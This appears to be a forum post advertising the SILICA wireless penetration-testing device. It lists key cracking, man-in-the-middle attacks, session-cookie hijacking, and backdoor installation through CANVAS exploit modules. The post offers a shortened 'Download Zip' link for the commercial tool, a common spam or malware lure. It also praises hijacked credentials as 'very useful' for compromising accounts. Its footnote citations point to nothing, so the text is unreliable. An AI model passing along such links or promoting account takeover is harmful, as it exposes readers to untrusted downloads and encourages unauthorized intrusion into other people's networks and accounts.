• Silica Wireless Hacking Tool Download

    From Feng Manison@21:1/5 to All on Sun Nov 26 16:49:32 2023
    SILICA: A Powerful Wireless Hacking Tool
    If you are looking for a tool that can help you perform wireless penetration testing, you might want to check out SILICA. SILICA is a product of Immunity Inc., a company that specializes in vulnerability assessment and exploitation. SILICA is a handheld
    device that can scan, exploit and report on wireless networks. It can also hijack web sessions, inject content, perform man-in-the-middle attacks and take control of wireless clients.

    silica wireless hacking tool download
    Download Zip https://t.co/XEwdpGETAs

    SILICA is more than just a scanner. It can determine the true risk of a wireless access point by leveraging vulnerabilities and accessing the assets behind it. It can also evaluate whether a mitigating control is in place on the target or in the
    surrounding environment. SILICA can generate reports for wireless and network data, as well as compliance standards such as PCI and SOX.

    SILICA can recover WEP, WPA and LEAP keys, as well as decrypt WEP and WPA traffic. It can passively identify vendors, hidden SSIDs and equipment. It can map a wireless network and its relationships with clients and other access points. It can scan and
    break into hosts on the network using integrated CANVAS exploit modules and commands. It can also hijack wireless client connections via access point impersonation and take full control of them via CANVAS's client-side exploitation framework (clientD).

    If you want to learn more about SILICA, you can visit Immunity's website[^1^] or watch some videos[^2^] of SILICA in action. You can also download a virtual machine image of SILICA for free[^4^] and try it out yourself.

    One of the features that makes SILICA stand out from other wireless hacking tools is its ability to passively hijack web application sessions. This means that SILICA can capture the cookies and tokens that are used to authenticate users on websites such
    as email, social networking and intranet sites. SILICA can then use these credentials to access the websites as the legitimate users and perform actions on their behalf. This can be very useful for gathering sensitive information, impersonating users or
    compromising accounts.

    Another feature that SILICA offers is its integration with CANVAS, Immunity's flagship penetration testing tool. CANVAS is a framework that contains hundreds of exploit modules for various platforms and applications. SILICA can use CANVAS modules to scan
    and exploit hosts on the wireless network and execute commands on them. For example, SILICA can use CANVAS to take screenshots, dump password hashes, install backdoors or run shellcode on the compromised hosts. SILICA can also use CANVAS's clientD module
    to exploit vulnerabilities in the web browsers of wireless clients and take full control of them.

    SILICA is a powerful and versatile tool that can help you perform wireless penetration testing in a fast and efficient way. It can help you discover and exploit vulnerabilities in wireless networks and devices, as well as assess their real risk and
    impact. SILICA can also help you comply with security standards and regulations by generating detailed reports of your findings. If you are interested in wireless hacking, you should definitely give SILICA a try.

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